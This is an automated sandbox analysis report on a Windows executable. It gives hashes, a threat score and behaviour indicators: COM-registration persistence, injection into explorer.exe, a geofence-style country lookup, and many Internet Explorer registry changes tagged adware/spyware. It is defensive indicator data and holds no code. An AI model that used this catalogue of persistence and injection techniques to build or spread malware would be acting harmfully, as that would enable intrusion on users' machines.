d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8

Analysis

max time kernel
139s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
Size

106KB
MD5

ea34fefb83379463c90acf2c5b650bed
SHA1

aa5a48ec8784d4e48c8fa70dec123c7c8aa0b83e
SHA256

d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8
SHA512

e6f40a47dd50e6958ade23957343c3a62732126c1577a21ef2acd31794233f3d5350fa3b9f4e73da1eacd6babea0905081c0fe1805db0da697310c840692adaa
SSDEEP

3072:xZMJnTeM4cJJiiQILa77j2NZmOSyt+DDMuzWtVhUxxd:/eTeM/MILI8Z2yQ/MGWcx/

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

FunshionInstall_C105806.exe

pid process

936 FunshionInstall_C105806.exe

Registers COM server for autorun 1 TTPs 53 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FEB50740-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A5-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B80AB0A0-7416-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{07B65360-C445-11CE-AFDE-00AA006C14F4}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{59CE6880-ACF8-11CF-B56E-0080C7C4B68A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4444AC9E-242E-471B-A3C7-45DCD46352BC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51B4ABF3-748F-4E3B-A276-C828330E926A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{336475D0-942A-11CE-A870-00AA002FEAB5}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{301056D0-6DFF-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{79376820-07D0-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E5B4EAA0-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8670C736-F614-427b-8ADA-BBADC587194B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D3588AB0-0781-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1643E180-90F5-11CE-97D5-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB8-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3ECBC41-581A-4476-B693-A63340462D8B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC785860-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37E92A92-D9AA-11D2-BF84-8EF2B1555AED}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D8AA343-6E63-4663-BE90-6B80F66540A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05589FAF-C356-11CE-BF01-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{48025243-2D39-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99D54F63-1A69-41AE-AA4D-C976EB3F0713}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{944D4C00-DD52-11CE-BF0E-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDBD8D00-C193-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{70E102B0-5556-11CE-97C0-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{418AFB70-F8B8-11CE-AAC6-0020AF0B99A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4979309-7A32-495E-8A92-7B014AAD4961}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB7-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2D2E24CB-0CD5-458F-86EA-3E6FA22C8E64}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8DFB9A0-8A20-479F-B538-9387C5EEBA2B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E651CC0-B199-11D0-8212-00C04FC32C45}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B87BEB7B-8D29-423F-AE4D-6582C10175AC}\InprocServer32	regsvr32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe

Loads dropped DLL 20 IoCs

Processes:

d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exeFunshionInstall_C105806.exe

pid	process
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
936	FunshionInstall_C105806.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe

Drops file in System32 directory 2 IoCs

Processes:

FunshionInstall_C105806.exe

description	ioc	process
File created	C:\Windows\SysWOW64\funshion.ini	FunshionInstall_C105806.exe
File opened for modification	C:\Windows\SysWOW64\funshion.ini	FunshionInstall_C105806.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe

description	pid	process	target process
PID 4204 set thread context of 2988	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a8000000000200000000001066000000010000200000009ed49bf9e0d2b94abcc9859ca3ca46d0d1b6b7cce1564183763d91d24d10bd28000000000e80000000020000200000004de4781199fa577e6580f4a8291fad42b7de87396478fda3caa6fa9eff4b5f2520000000050e80dc34d631e972adaeb22afbb680460ad380796a168e882c45d4199d79fa40000000d34346215a1dfdeb7945f72e193ccc460c65bda87f4fce8785b9fc04e41d6fb6c5407388bd14bed3577f841652d4460cfc63232bba510ce80b07f0a3a17112a4	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3307893953"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a80000000002000000000010660000000100002000000031b40fd43c88ca0d0933d752d8acc7795618f49ad701adab2741d6924a0ea8a7000000000e80000000020000200000005276574dbd6f465e5792943e14cd176411a7781ffb41072e87ba28fd13fa68c120000000e720711d7dc1829c53ff76716aa836e3603aaafcdc033db6298c6e27d8d44b7e40000000b358c7570667945d540db701670a7455851348b228d50f87f5ef92cb898a27b360e8bb19338b512d7d844208958a3a8b1e4b6b5eff6c3298e49ea40477106815	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0b541d338ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30fb39f138ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3400000034000000ba04000099020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 807c34df38ffd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50131ff738ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00bd35c338ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c040eddb38ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 101534fd38ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{F07238E8-6B2B-11ED-B696-C264E7FE3618} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3551801028"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3407112396"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4e00000000000000d404000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0c816eb38ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90920cb938ffd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60506bc738ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a8000000000200000000001066000000010000200000005dd83170b311d53f1f93eba71a503e5fbd4e8ed008748253ba2a12913903b7a0000000000e8000000002000020000000e5e78bf80fe26589a149d0da57b5ab61cb6648693eaf261331ec5e0e90cd27192000000045ca33a6965e237969cf93797ceb36ec5acb977355e0e47713f9076d45aa327140000000503d0d3f7cb3018e6212959c84438b8e8d67e77b095be9ee9e82d2a32ff5568c43c0e8c26574b54410a47590b674343046c1f104a8737ed08c2dcd8a997410d8	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a800000000020000000000106600000001000020000000a41c13b771c62588a398a30e8eb3817d7c2f1271dff00fa744dd39cbb7eb5147000000000e80000000020000200000005b1225d1631245a1b70e1dbadec03ab960911649677e0369c3400266e629dbc22000000058500ee1507507cd23151a9c812a109ff967d0d4141f7ea0a4fbc8ac9e36966e400000004780a98222ad3d209d544faca9220199814715b8cdd83536867fe491af7a6ff53f4628976ef2ca2d70c76ad5d58b0f3fcd199b691fb440acac2b3c231bb56740	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a800000000020000000000106600000001000020000000fc3e6641d757d33497a983828269eb6403d1d116f721750ac44115f5b901fe91000000000e8000000002000020000000ef6a5273cd0d9fc324fe0c0b954cd86bca785f0bb5fb4d0a751cbe07308c060e200000004b0b13d67a93ad653e867d70cdf47309d14bac12eabc6c80f52b3733a44fedd040000000959cb9ba274100b690b6ada45b18de67399d12a30be6616f1151ce971923cfbeaa1297b6c6299f3c265e10e31306ec12b1b6c91a234ddc8508f023a80e71b8bc	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a800000000020000000000106600000001000020000000e568d43256251b1a1c44e1eaba4158a339f838de2525916b883089da0035cf02000000000e80000000020000200000003c91e54157df3c4158a9128e873efa3f6f035957bdfdc5bdb47d998b5e55bbc120000000ff4ca713b3ccecff09b05d0da15b11e0b16cf95aee8160250c7c656be851bdd04000000085a667090273696df43713917f62cbbfa37e2d865eabf0131f656633c270904fa158f6404def4a3f8a38e65baf9bc5ba3b92c9cd9ccd5ab864caa91b73ac3ad1	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a80000000002000000000010660000000100002000000014a3fb5ab2ffee27d860825144ab16676882c0183e8e5e9bb6732885700ea7b8000000000e8000000002000020000000906ad99907cf5736621f0a70a541ed6637dbbbc4d4c2f115a8a15d64a8e4633920000000bc1a60a4656c2c5872d0a2eb5f9cb6697ed0305d6a75e7f349bfc4322cca05da400000003a80b93c86f611d35a4136bee5550ba9ea3df605cdef109e403bafd98aaf59bbe79a72c574435f8a2ab38dbff47295c78fbff264c3309164954b0afe06add467	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
